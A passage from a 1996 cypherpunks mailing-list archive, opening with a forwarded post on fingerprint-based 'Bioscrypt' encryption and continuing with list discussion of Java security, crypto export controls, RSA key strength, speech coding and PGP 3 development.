about his company's technology that arose in response to a query that
I sent to the Computer Privacy Digest.  He provides the company's web
URL for those who wish to know more.]

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
This message was forwarded through the Red Rock Eater News Service (RRE).
Send any replies to the original author, listed in the From: field below.
You are welcome to send the message along to others but please do not use
the "redirect" command.  For information on RRE, including instructions
for (un)subscribing, send an empty message to  rre-help@weber.ucsd.edu
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Date:       Fri, 31 May 96 11:06:44 EST
From: Computer Privacy Digest Moderator  <comp-privacy@uwm.edu>
To: Comp-privacy@uwm.edu
Subject:    Computer Privacy Digest V8#044

Computer Privacy Digest Fri, 31 May 96              Volume 8 : Issue: 044

- - ----------------------------------------------------------------------

Date: 29 May 1996 09:42:54 -0400 (EDT)
From: gtomko@noc.tor.hookup.net (George Tomko)
Subject: Re: Biometric Encryption

Dear Mr. Levine:

Subject:        Biometric Encryption

I have noticed a number of communications in your news group regarding
Biometric Encryption, especially some concerns about its use.  As one
of the developers of this technology, I would appreciate if the
attached response could be posted in the news group to provide people
with some answers and also to obtain feedback and discussion.

Kind regards.

George J. Tomko, Ph.D.

Several people commented on four concerns in using a finger pattern for
biometric encryption, namely:

1.      It's easy to get someone's fingerprints since they are left on
a vast number of everyday objects, such as drink cans and door handles;

2.      Muggers would start cutting off people's fingers when stealing
their cards;

3.      The crooks would forcibly hold down an individual's finger
against the biometric encryption authentication device to extract the
string coded by the individual's Bioscrypt; and

4.      If the finger used to code the Bioscrypt is damaged or
destroyed, then an individual will not have access to the files
associated with the Bioscrypt.

I will try to answer these concerns in order.  But, first, let me
define a Bioscrypt.  A Bioscrypt is a two-dimensional image of a string
or set of characters which can represent a PIN, encryption key or
pointer and which has been coded (encrypted) by the two-dimensional
information in a fingerprint pattern.  It has the following
properties:

- - -       it has no resemblance to the original fingerprint.
- - -       it cannot be reconverted to the original fingerprint.
- - -       if an optical image of the correct live fingerprint is transmitted
through the Bioscrypt, then the output light beam uniquely represents the
coded number.  By successfully decoding their Bioscrypt, the person also
confirms who they claim to be.

For purposes of the discussion below, it is important to note that the
optical authentication device is a coherent system and uses the phase
information in a finger pattern (complex domain) as a discriminating
parameter.

1.      "Picking up latent prints from door handles, etc."

To perpetrate a masquerade using a latent fingerprint of a legitimate
user is very difficult for the following reasons:

* The system requires a three-dimensional reconstruction of the
legitimate user's fingerprint because the height of the various
fingerprint ridges can modify the two-dimensional complex optical image
which is the input to the authentication device.  There is little
information in a two-dimensional latent print about the depth and the
height of grooves and ridges of the actual fingerprint.

* The three-dimensional reconstruction of the legitimate user's
fingerprint from a latent print would also need to duplicate the
approximate oil and moisture content of the skin, since this is one of
the factors which affects (modulates) the two-dimensional image read by
the system.  Quantifying this information from a latent print is very
difficult.  Even if it were, the three-dimensional reconstruction would
have to be made from a synthetic material which had the same oil and
moisture properties as the legitimate user's skin.  To use an oil/water
based solution to place on the input scanning window would be useless
since this would frustrate all of the light bouncing off the window and
would convey little or no useful information to the optical system.

* The reconstructed fingerprint would also need to be made from a
material with approximately the same elastic properties as the
legitimate user's finger skin.  During enrollment, and subsequently on
authentication attempts, the user slides a finger over the input
scanning window.  This action warps the skin and the corresponding
fingerprint pattern based on the elastic properties of the skin.
Within the population, warping can vary significantly based on age,
dryness of skin, etc. and is thus another unique aspect of the
individual's finger pattern.

2.      "Severing the finger to obtain access."

As already mentioned in some of the previous communications in this
newsgroup, measuring the temperature, humidity, pulse rate and even
heart rate to verify a live finger can be accomplished.  One of the key
factors, though, is after the finger is severed the elastic properties
of the skin change rapidly and thereby would not warp in the same
manner as a live finger pattern.  This would make a cadaverous finger
useless after a period of time.  (Can't find subjects to do a double
blind study though).

3.      "Crooks would forcibly hold down the finger."

By forcibly sliding an individual's finger against the biometric
encryption authentication device (reading device), the string coded by
the Bioscrypt can be extracted.  The string coded by the individual's
finger pattern Bioscrypt could then be used for a one-time access for
whatever purposes the string was intended.  However, assuming that the
individual is freed, he can then use his finger pattern to code a
completely different string to prevent repetitive access.

The system is robust in that it is very easy to change PINs, encryption
keys or computer pointers.  It was suggested in some of the messages
that a pass phrase be used in conjunction but, again, if an individual
is holding your finger down forcibly, to extend that to pointing a gun
to your head to divulge the pass phrase is not an extreme assumption.
There is no perfect security system out there and I doubt one will ever
be designed since it has to work with real human beings.  I suggest
that the goal is to provide privacy-enhancing technology that handles
the majority of the infringement cases and that, for exceptional
circumstances where extreme privacy and security must be guaranteed, we
combine the biometrics (something you are) with the pass phrase
(something you know) and a token (something you have).  If the
combination of those three doesn't do it, then at this stage of
technological evolution, nothing will cut it.

4.      "Losing or damaging a finger with the result of not being able
to access the Bioscrypt and related files."

One of the properties of optical processing is that composite patterns
can be made and thereby used to make the Bioscrypt.  Accordingly, more
than one finger could be used or a finger and a proprietary pattern
(which one keeps hidden away somewhere).  Of course, there is a
penalty.  The more patterns one uses, the smaller the signal to noise
ratio of the system.  The system is currently designed to give signal
to noise ratios in the order of 10 to 12 dB and thereby significant
degradation can still occur which would allow comfortably two to three
patterns to be superimposed in the same Bioscrypt.

If you are interested, more information can be gained by accessing
Mytec's web page at http://www.mytec.com.

- - --
George J Tomko
Mytec Technologies Inc.
Toronto, Ontario

- - ------------------------------

End of Computer Privacy Digest V8 #044
******************************


- ------- End of Forwarded Message


------- End of Forwarded Message





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mccoy@communities.com (Jim McCoy)
Date: Wed, 5 Jun 1996 16:23:25 +0800
To: cypherpunks@toad.com
Subject: Re:cycle market
Message-ID: <v02140b00adda538b7b78@[205.162.51.35]>
MIME-Version: 1.0
Content-Type: text/plain


Bryce writes:
> I was trying to think what I would use a cycle market for.  The
> only thing that I wait for more than a minute on currently is
> compiling.

Tasks which are inherently parallel (preferably ones where the
various processes are loosly coupled and the need for inter-task
communication is low) are the first things that come to mind,
because advances in the speed of CPUs does not give you the same
advancement increment in solving these problems.  Some examples:

        -rendering and ray tracing
        -simulation
        -analysis of large datasets
        -genetic algorithms and genetic programming (something I am
         working on creating a "cycle market" for in my spare time)

The other class of tasks which could use such a market are those which
are limited more by bandwidth than by processor speed.  If the server can
be given many "heads" which can provide the service (with the back-end
processing done by cycle markets) then it is possible to make significant
gains in distributing the I/O load and getting around network latency by
creating server which is "virtually omnipresent."

jim






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben Holiday <ncognito@gate.net>
Date: Wed, 5 Jun 1996 09:36:26 +0800
To: cypherpunks@toad.com
Subject: Asendmail yet again
Message-ID: <Pine.A32.3.93.960604131256.53274A-100000@seminole.gate.net>
MIME-Version: 1.0
Content-Type: text/plain



Ok so it isnt really and truely available.  The right URL should have
been: 

http://www.cyberpass.net/~ncognito

If that still isn't right then im gonna assume that god is giving me a
hint and go shoot myself in the head. 


Adios.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Wed, 5 Jun 1996 12:37:04 +0800
To: cypherpunks@toad.com
Subject: MELP: 2400 baud speech coding
Message-ID: <199606042031.NAA25407@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Mixed-Excitation Linear Predictive encoding gives better speech
quality than CELP at half the data rate.  Encoding and decoding
together burn up more than 100% of a TMS320C3x digital signal
processor at 33MHz -- 64% to encode and 53% to decode.  I don't know
how it does on a Pentium or an Alpha.  If you have the MIPS at both
ends, this enables very robust encrypted speech across modem links to
the Internet.  John Walker's free SpeakFreely software
(http://www.fourmilab.ch/speakfree/windows/speak_freely.html; or
follow the link from there to the Unix version) is already doing
packet replication for high reliability, using the earlier LPC-10
algorithm.  (It doesn't implement MELP, though those on fast CPUs
could add it.)

I noticed an ad in EE Times that said, "MELP: The new Federal Standard
for 2400 bps Speech Coding", so I did a web search for it.  It
reportedly comes from Georgia Tech research.  Atlanta Signal
Processors has the exclusive license.  See
http://www.ti.com/sc/docs/dsps/softcoop/voc-13-1.htm.

	John Gilmore





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 5 Jun 1996 16:29:13 +0800
To: perry@piermont.com
Subject: PM's Java Envy
In-Reply-To: <199606040222.WAA06345@jekyll.piermont.com>
Message-ID: <199606042033.NAA17694@netcom19.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



PM returns to rant on Java after being mowed down by most people
her. why? I think he has some more ulterior problems with Java
than those that he cites. for Perry, ranting at java reveals
certain psychological characteristics of his profile.

>For at least twenty or more years, people have known that for the
>ultimate in multimedia email or what have you all you would need to do
>is make the recipient execute a program that you sent them. This
>obviates all the questions of having to figure out what sort of things
>you would want to send -- if you can execute a program, you can do
>anything. Unfortunately, this is also so phenomenally obvious a
>security problem that no one ever proposed it as anything more than a
>joke -- until now.

so you agree, what they are trying to solve is the holy grail of
distributed computing, in some ways. but you start from a different
assumption-- that such a thing is a joke to even try. they are
forging ahead because they have started with the opposite assumption.

>Sun is, unfortunately, suffering from a substantial hubris problem. As
>I have noted, the original Java applet security model and all the
>followups have had exactly the same problem -- they depend on perfect
>implementation of every element of the security model for the security
>to work, instead of having the realistic and conservative assumption
>that portions of the model will be misimplemented, and designing for
>defense in depth.

true, but as I have reiterated here, there is nothing preventing
someone from creating an IMPLEMENTATION of Java that has the
"defense in depth" that you are always ranting about. why don't you
INVENT it??? such a thing is possible. Java is mostly a theoretical
construct: a language. implementations are left up to different
licensees. how else would you  propose handling it? surely the
NSA would have plenty of suggestions for putting a lock and
chain around ideas. the rest of us in the real world would like to
get some computing done.

I continue to believe that everything you are asking for could be
integrated into somebody's ingenious invention of a Java interpreter.
something that implements all the features of Java in a secure way.

notice, Perry, that if there was such a thing as a secure OS, you
could just stick your Java browser in it and not care at all. you
have your "redundant systems protection" if you already have a 
good OS. what? there aren't good OSes? well, why are you blaming
someone who is writing a computer language because their aren't
fully secure OSes?

wouldn't Java running on a Kerberos system come close to the kind
of security and redundancy you are proposing? such systems will
probably evolve in the future. but why is a problem outside
of java considered a problem of java itself by you? 

speaking of "hubris", I think it is you that is the most "full of it".
you don't seem to understand some simple conceptions, which I have
stated before in response to your ranting but you have never 
really replied to in the past:

1. NOBODY IS ASKING PERRY METZGER TO USE JAVA. people who ARE using
it may have different needs and demands than you have. who are you
to criticize all the people who have made an independent decision,
"java is what we want"?

2.  java threatens CONTROL by individuals over what they allow to
run on their machines. it's the old "mainframe vs. PC" problem all
over again. surprise!! pc's won. WHY? because people wanted to
get work done without going through an all-powerful MIS priesthood.
but surprise, some companies still are implementing a priesthood
around their PCs. Java will help break through such kinds of monopolies.
you are free to reject it, but you are getting a glimmer of understanding
that Java threatens the idea of monopolistic, monolithic control
over computing resources. the sysadmin with his own narrow interests
may no longer be the only one who has say over how company computing
resources are used.

3. no one is claiming Java is perfect. it will take years before
a high level of trust is established. no one is implementing all kinds
of incredibly sensitive applications in Java, YET. it is an evolutionary
process.

4. in evolutionary processes, you aren't trying to find nirvana or
utopia, or solve problems that no one has ever been able to solve.
you make an *incremental*step*. Java is precisely this very valuable
incremental step. I don't know why you continue to rant so endlessly
against it. NO ONE IS ASKING YOU TO USE IT. your comments are not very
valuable, either, considering that YOU ARE NOT USING IT. perhaps the
people who are USING IT are far more qualified to judge whether
it is fulfilling their needs, eh?

5. the world is very insecure right now in terms of computer security.
java is a step in the right direction. there are a bazillion places
it can be plugged into right now in which you get *better*security*
than what you had before by using it. now, I wouldn't recommend
placing it anywhere where you would have *less* security, but I 
trust designers of systems to have some sense about that. (yes,
there are a lot of bonehead designers in the world, but why do you
think it is a problem with Java exclusively? granted, the hype
machine is way out of control, and this can lead to improper uses
of the language, but there are still a lot of places where it
is useful).

6. if you could point to some EXAMPLES of people using Java that
shouldn't be, and ARE, then you will have a much better case.
but all you have at the moment is a nagging suspicion that all
kinds of people are using Java where it shouldn't be placed.

7. frankly I think you have "security envy" of pioneers who are
creating the next generation of cyberspace and didn't pay some
monstrous consulting fee to you in doing so. I think you would
have liked to have been behind Java, because it is the next
step in a field you feel you are an expert in, but instead it
appeared on the scene without you ever taking it seriously, and
you are increasingly pissed off that other people are taking
it seriously, and that your arguments, which at one point people
might have agreed with, are becoming less valid in the face of
reality as people begin to understand what java is for (and
not for!!).

8. criticizing something because it is not evolved is a bad
way to go. C started out as the most flimsy of languages. there
were serious bigtime problems with it. early compilers had 
ambiguities, etc. things get better. the way of the world is
evolution. the tools that *you* are using *now* could have
been criticized in their infancy as completely insufficient
for the jobs they were "aspiring" to. they *were*. things
like PCs were once the most disrespected "toys" on the planet.
and you criticize Java because it is "toylike"? beware, PM, 
because the toys of today become the tools of tomorrow.

>
>Beyond that, however, they have created the ultimate hype
>monster. Java is a neat idea looking for a good application. I use the
>web all day long and I have yet to see a good use for Java. We have,
>essentially, mortgaged our system security for almost nothing better

"we"??? hee, hee. someone who is the first to slash someone with 
claw-marks for using that term here among the Nihilists uses it himself.
there was absolutely no system of security prior to java for what it
is attempting to implement. the world is not going to end when everyone
starts playing with java applets. I agree that there should be some
serious question about where companies allow browsers with Java (or
browsers for that matter) to be run. but you have this kind of
siege mentality, "we're being invaded!! POUR DOWN THE HOT OIL!!"

>than the occassional gee whiz animation that could have been
>implemented with a safe graphics description format instead of a
>turing equivalent language.

a killer java app hasn't yet been written, imho and other. 
so what? why are you whining about it? again, no one is forcing you to use 
java. the killer app lies around the corner. the PC didn't start out
with excel written for it, and only an illtempered, impatient
bonehead would demand such a thing.

>
>Again, I don't hate the Sun people or hold any animosity towards
>them. However, I will point out the lesson that any good student of
>Greek Tragedies could tell you -- the gods punish hubris, and severely.

hee, hee. sounds like you speak from experience. reminds me of that
saying, "good judgement comes from experience and experience comes
from bad judgement". <g>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: declan@well.com (Declan McCullagh)
Date: Wed, 5 Jun 1996 10:53:50 +0800
To: cypherpunks@toad.com
Subject: How to explain crypto?
Message-ID: <v01510100adda3101165c@[204.62.128.229]>
MIME-Version: 1.0
Content-Type: text/plain


Brock, the crypto-challenged, humbly apologizes for his gaffe. He was
looking for a way to draw an understandable comparison of how much harder a
1024-bit implementation of RSA is to break than what current export
controls allow.

He's asking for suggestions on how in future articles he could word this so
a layman could understand it... Preferably something that could be said in
a few sentences. (Brock cops to the fact that it does an incredible
disservice to a complex topic. Remember, tho, he writes for a broad
audience with a way diverse range of understanding -- or misunderstanding,
as the case may be!)

For example, someone sent me this explanation:

  "The 1024 bit key is likely an RSA key, and is not comperable to a 40 bit
  symetric key.  From memory, 1024 bit RSA is about as hard to crack as 90
  bit symetric."

Is this a reasonable comparison?

-Declan






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 5 Jun 1996 13:07:15 +0800
To: cypherpunks@toad.com
Subject: Re: Where are the cryptographers going to come from?
Message-ID: <199606042100.OAA11210@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:22 PM 6/4/96 -0000, nelson@crynwr.com wrote:
> The NSA believes that they
>can and should discard any amount of benefits of crypto in exchange
>for avoiding any harm of crypto.  They are wrong.

I think the truth is even more revealing.  We can hypothesize that 
allowing widespread use of good crypto has many advantages and just a few 
disadvantages.  However, those disadvantages may almost all accrue to 
government and its employees, and very few to ordinary citizens.   This 
means that talking up the disadvantages of good encryption is doubly 
fraudulent, because the audience they should be trying to convince (ordinary 
folks) doesn't realize that the disadvantages generally don't apply to them. 
 And of those few crimes against ordinary citizens where crypto might play a 
role, that role will almost always be to PREVENT the crime rather than allow 
it.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 5 Jun 1996 13:43:59 +0800
To: perry@piermont.com
Subject: Re: Java
In-Reply-To: <199606041306.JAA08943@jekyll.piermont.com>
Message-ID: <199606042058.NAA19741@netcom19.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



maybe Java is about a generation gap in programming languages...??

>Bill Frantz writes:
>> At 10:22 PM 6/3/96 -0400, Perry E. Metzger wrote:
>> >I've been rather hard on Java here lately.
>> 
>> I'll say.  You have also ignored some of Java's other features.  Machine
>> independence is probably the most important.
>
>Many languages are machine independent. Thats hardly a new feature.

you don't get it, as others have pointed out repeatedly. you conveniently
ignore Frantz' points about the well-known difficulties of porting C. there
is a big difference in what is conneted by the word "portable". 
if it take a zillion different makefile rules to create the "same"
program on different machines, is that "portable"? isn't that
defeating the purpose somewhat? c is "sort of" portable. it is
"in theory" portable. Java is portable "in theory and practice".

>However, your point is taken. Java is a neat little language in many
>ways. However, that isn't cause enough for literally fifty books on
>the subject to be on display, including breathless ones proclaiming
>"Tips from experienced Java programmers!" as if there are any in the
>world at this point. There are dozens of cute little languages in the
>world -- scheme, smalltalk, etc, etc.

a little clue to you Perry, there are so many Java books because there
is such a huge market for them. I always thought you were an 
anarchocapitalist and in favor of "letting the market decide". in a
sense you are arguing with the market, it seems, in much the same
way a liberal might say, "why are all you greedy businessmen hyping
your railroads so much?!?!?"  however I fully grant you that Java has been
the most hyped computer language on the planet. (but then again, I
didn't hear you whining when Intel started their "intel inside" 
campaign). I think what you are seeing is that people are excited
by the possibilities. the public has grasped the message behind Java,
which at this point is more about potentialities. its like saying,
"who is the next marc andreesson?" 

the problem appears to be simply that you are annoyed that other people are
excited about java, and you seem not to like excitement. you don't
like hype. well, personally, I think the hype is pretty damn amusing.
the world couldn't have given the slightest damn about geek computer
programmers say 5 years ago, but after the internet and Netscape, Yahoo,
and Java it's suddenly incredibly trendy. I think its quite enjoyable.
I suppose if I was over 40 and worked in a conservative wall street firm,
I'd have a totally different view. maybe Java is all about a generation
gap in computing. hey!! the first language that the "older generation"
hates. sounds like a good reason to go after it, sort of like rock-n-roll
and Woodstock suddenly being aged and uncool.

>I mean, with all the "Teach yourself Java in 21 days" and company
>books coming out, you would think you were dealing witht he major
>application programming language for the world instead of something
>that at the moment is used for almost nothing more interesting than
>fake scrolling LED sign applets.

actually, the quality is not all that great in all of them, I agree. 
I thought for example Van Der Linden's "Just Java" is a pretty weak one. 
it has paper airplane instructions in parts of it. but hey, maybe
again its a generation gap thing. I bet I would have really enjoyed
the book and thought it "way cool" in my teens. <g>

>Since that doesn't exist, it isn't an option for my users. It is not,
>in any case, my obligation to make Java secure. I'm not the one hyping
>it.

no, but you are the one ranting at it. why? it is not Java's 
obligation to make OSes more secure either!!! @#$%^&*


>You could hand any websurfer a Netscape PGP plugin without much work
>at all, and you could easily build it on lots of platforms. After all,
>look at how many platforms that lowly C code like PGP runs on.

look at the complicated PGP makefiles. count how many MAN MONTHS of additional
testing and work is required merely to deal with the makefiles. count
how many BUGS are due to improper compilations. count how hard it
is to track this kind of thing. count how hard it is to test your
makefiles not given that you have all the zillion different environments
you are supporting immediately available for testing.

every language is about tradeoffs. if you continue to say that C
is better than Java for just about anything, then you clearly are
not saying anything very relevant based on most people's opinions.

why am I arguing with you on this? because while you are usually
a pretty sensible person, you are really way off
base on this one. the world requires a mix of conservatism and
imagination. you've got the conservatism down totally, but the
imagination part you are lacking, and hence your criticism of
java. PM, imagine yourself at the invention of the LAN, or the PC,
or the C language. what would you have said to the designers? 
"you are all boneheads!! what you are doing can't be done!! you
are wasting your time!!"  do you think perhaps that every useful
computing tool that can be invented has already been invented?
hee, hee.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Wed, 5 Jun 1996 13:19:55 +0800
To: Paul Robichaux <cypherpunks@toad.com
Subject: Re: Markoff in NYT on NTT/RSA chip
Message-ID: <199606042119.OAA07875@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:08 PM 6/4/96 -0500, Paul Robichaux wrote:
>2. Markoff's story says that NTT doesn't have licenses to use RSA
>technology (the quote from Junichi Kishigami), but the bit about safely
>swapping private-key info makes me wonder if instead they're using DH-- the
>patent for which expires next year. A telecom chipset could make productive
>use of DH for key exchange at call setup.

They could use RSA for key exchange outside the USA because RSA is only
patented in the USA.  With a license for RSA they could also sell them in
the USA.  My reading of the New York Times article is compatible with the
view that Jim Bidzos is driving a hard bargin for such a license. 
(However, the article does say that NTT has already sold chips to IBM in
the US.  I guess you can sell, but not deliver, until you get the license.)

Obviously if you are outside the USA, you will buy your equipment from
Japan Inc.  US manfactures will be frozen out.  (However the US can still
compete for the Chinese market since such privacy will be illegal there
:-). )


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Wed, 5 Jun 1996 13:56:25 +0800
To: perry@piermont.com
Subject: Re: Java
Message-ID: <199606042119.OAA07878@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  9:06 AM 6/4/96 -0400, Perry E. Metzger wrote:
>Bill Frantz writes:
>> I'll say.  You have also ignored some of Java's other features.  Machine
>> independence is probably the most important.
>
>Many languages are machine independent. Thats hardly a new feature.
>...
>However, your point is taken. Java is a neat little language in many
>ways. However, that isn't cause enough for literally fifty books on
>the subject to be on display, including breathless ones proclaiming
>"Tips from experienced Java programmers!" as if there are any in the
>world at this point. There are dozens of cute little languages in the
>world -- scheme, smalltalk, etc, etc.

I guess I tend to react to the Java hype with bemusement rather than
horror.  I enjoy joking with the clerks at Computer Literacy Bookstore
about the "Java book of the day".  However, unlike so much of the
industry's over hyped marketing, with Java there is actually something
worth while hidden under the massive hype.

Java appears to have a chance of being adopted widely in the industry.  We
can discuss until the cows come home why Smalltalk, Scheme etc. have not
achieved wide usage.  I suspect it may be a combination of unfamiliar
syntax, licensing issues, version compatibility issues, and the inability
to do low level programming.  These issues may also hit Java, but for now
it is the nicest language around with a bandwagon behind it.  If it
replaces Basic, that will be a significant step forward.
 

>I mean, with all the "Teach yourself Java in 21 days" and company
>books coming out, you would think you were dealing witht he major
>application programming language for the world instead of something
>that at the moment is used for almost nothing more interesting than
>fake scrolling LED sign applets.

I agree that all the hype has been about applets.  However there is one
common non-applet Java application that shows that significant applications
can be written in Java.  That application is the Java compiler itself.  If
you are running on a Sun system, you can do real applications today.  (On
the Mac you are still in the "applet jail", but I haven't opened the latest
Java environment that arrived on my desk last month, so I may be obsolete.)


>> If you want defense in depth, run your Java interpreter in an OS
>> environment which limits the interpreter's access to only those resources
>> you wish it to access.
>
>Since that doesn't exist, it isn't an option for my users. It is not,
>in any case, my obligation to make Java secure. I'm not the one hyping
>it.

I thought this was the effect the Unix people get when they run
applications such as firewall code in a "chroot jail".  Perhaps Netscape
could make you happy by having its Unix based browsers run Java applet
interpreters in such a jail.  (I don't know, Unix is an imperfectly spoken
foreign language to me.)


>You could hand any websurfer a Netscape PGP plugin without much work
>at all, and you could easily build it on lots of platforms. After all,
>look at how many platforms that lowly C code like PGP runs on.

Why don't we have one of these now?  (N.B. not a rhetorical question)


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Wed, 5 Jun 1996 08:23:37 +0800
To: take@barrier-free.co.jp
Subject: (Fwd) Crypto conference
Message-ID: <199606041439.OAA23122@pipe2.t1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


>----- Forwarded Cyberia-L message (DAVID POST <postd@EROLS.COM>) -----< 
 
 
I was at EPIC's annual crypto conference yesterday, and just thought I'd 
pass along my impressions. It was, as always, extremely interesting; EPIC 
does a terrific job at these things of getting a very diverse and
thoughtful 
collection of people with interests in crypto policy into the room
together, 
everyone from Whit Diffie and Phil Zimmermann and Eric Hughes to Scott 
Charney of DOJ and Bruce McConnell of the White House, people from the OECD

and the hardware/software community, etc. 
 
 
There were panels on key escrow, digital cash, international developments, 
and the Karn/Bernstein cases and other domestic policy developments.  To
me, 
the most striking feature of the event was what I felt was a new bite to
the 
complaints about export controls.  People have been complaining, needless
to 
say, about these for a while -- but the *economic* case for lifting
controls 
is now in the forefront of the discussion in a way that was not the case 
before, imho.  Indeed, there wasn't an enormous amount of talk about the 
*privacy* implications of encryption this time at all.  Jim Bidzos of RSA 
gave a very powerful talk at lunch, at which he unveiled two chips that are

now being mass produced by Nippon Telephone, one incorporating the 
Triple-DES algorithm, and one with the RSA public key algorithm.  Someone 
else pointed to a recent story in the Economist, which listed the leading 
encryption software/services companies worldwide, each of which is Israeli.

Bidzos made the claim, and many others echoed, that the export controls are

in the process of doing nothing more than ceding a potentially lucrative 
market to others, a market in which the US might otherwise be expected to
be 
the dominant player.  It may even, in the eyes of some, be too late to undo

this damage. 
 
 
Now, some of this may be exaggerated, special interest whining.  But 
there's an interesting hook here.  Many have talked about the importance of

control over "standards " in network industries, the importance of
obtaining 
an early dominant position in the market that can appropriate all of the 
network externalities waiting to be plucked out there.  [Mark Lemley has an

interesting discussion of this in a piece on antitrust on the Net -- Mark, 
is that out anywhere yet?]  Acting quickly to penetrate the market becomes 
critical, not just because markets change on "Internet Time," but also 
because the early entrants have a chance of establishing themselves as de 
facto standards and thereby extending their dominance over time.  This, one

can plausibly argue, is what is happening -- has happened? -- in this 
market.  It is more credible in these kinds of markets to argue, as Bidzos 
was arguing, that if government policymakers wait until there's actual 
evidence of damage, of "lost market share," to US companies, that it will
at 
that point already be too late to do anything about the damage. 
 
---------- 
 
[Second Cyberia-L message by David Post] 
 
 
One other interesting issue generated heated discussion -- as in yelling
and 
screaming between audience and panel -- at the EPIC conference.  Scott 
Charney of DOJ, who heads the US delegation to the OECD crypto guidelines 
conference, was subjected to pretty heated questioning about the
possibility 
that the US is trying to use the international forum as a way to move a 
particular policy agenda that is *not* being successfully peddled at home, 
and then to use the international support as a means of moving the domestic

policy debate in that direction.  Jamie Boyle of AU was particularly 
eloquent about this concern (I raised it too, less eloquently) -- I think
it 
fair to say that both of us had the copyright experience in the back of our

minds, where, many of us believe, the US has been pushing the "Lehman 
agenda" in international discussions as a way of presenting Congress with a

kind of fait accompli.  Charney vigorously denied that this was going on --

he strongly argued that since the OECD guidelines are non-binding (unlike, 
say, the treaty obligations being discussed in the copyright context), 
there's simply nothing wrong with discussing these clearly global issues 
with our international partners. It was, as they say in the press, a 
spirited exchange. 
David 
 
 
********************************* 
David G. Post, Georgetown University Law Center 
Postd@erols.com    202-364-5010 
Cyberspace Law Institute home page http://www.cli.org 
********************************* 
 
 
 
David 
********************************* 
David G. Post, Georgetown University Law Center 
Postd@erols.com    202-364-5010 
Cyberspace Law Institute home page http://www.cli.org 
*********************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Wed, 5 Jun 1996 15:09:29 +0800
To: Bill Frantz <frantz@netcom.com>
Subject: C++
In-Reply-To: <199606040626.XAA09729@netcom7.netcom.com>
Message-ID: <Pine.SUN.3.93.960604142353.15547E-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


> [As an aside, when I attempted to compile Wai Dei's crypto lib 2.0 with the
> Symantec Project Manager C++ compilers, none of the 3 would compile it. 
> The one which generated the fewest errors had "internal error" on two
> modules.  This problem occurs because C++ is such a large language, with a
> number of obscure features which compiler writers don't always handle.  In
> addition, C++ is in no way machine independent.  The simplest example is
> that sizeof(int) is machine dependent.]

It's true that C++ is large and has many features, some obscure.  But the
fact is most of those features are actually very useful.  I suspect many
experienced C++ programmers do not like Java even though Java looks a lot
like C++ because they are so used to having those features in C++.  Take a
look at Victor's earlier post on this subject.

Portability is certainly one of the big problems of C++.  But it can be
done and should become easier in the future as the compilers standarize. 
If anyone has trouble compiling Crypto++, please send me a report so I can
help you figure out workarounds.  Also, send bug reports to the compiler
company if you think there are bugs in the compiler.

Wei Dai






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Wed, 5 Jun 1996 14:53:39 +0800
To: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Subject: Re: Why PGP isn't so ubiquitous (was NRC Session Hiss)
In-Reply-To: <199606040228.WAA17430@unix.asb.com>
Message-ID: <9606041912.AA01215@bill-the-cat.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain


> > I have a growing feeling that PGP 3 is never going to happen. Or that if it
> 
> I'm soft-of having that feeling too.  Or what's going to happen is 
> that enough people will get impatient and international versions will 
> start to appear.

Unfortunately the 80-20 rule is hitting the PGP development team
really hard.  We had 80% of the code done about 6 months ago, and it's
been taking a LONG time to get the other 20% up to speed.  This is a
COMPLETE re-write of the whole system, from scratch, from the bottom
up (and top down).  It was NOT a small feat, and it takes time.  As it
is I feel rushed to get it out the door.

I know that I need to make the API document available, and I'm working
to do that.  But I have to offset the time I spend coding to the time
I spend working on the API document(s) to the time I spend jumping
through hoops to make the PGPlib project happen.  The more time I
spend working on one part, the longer it takes for the other parts to
happen.

So, would you rather see a document right away, or code released
sooner?  Take your pick and let me know. :)

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nelson@crynwr.com
Date: Wed, 5 Jun 1996 07:43:12 +0800
To: cypherpunks@toad.com
Subject: Where are the cryptographers going to come from?
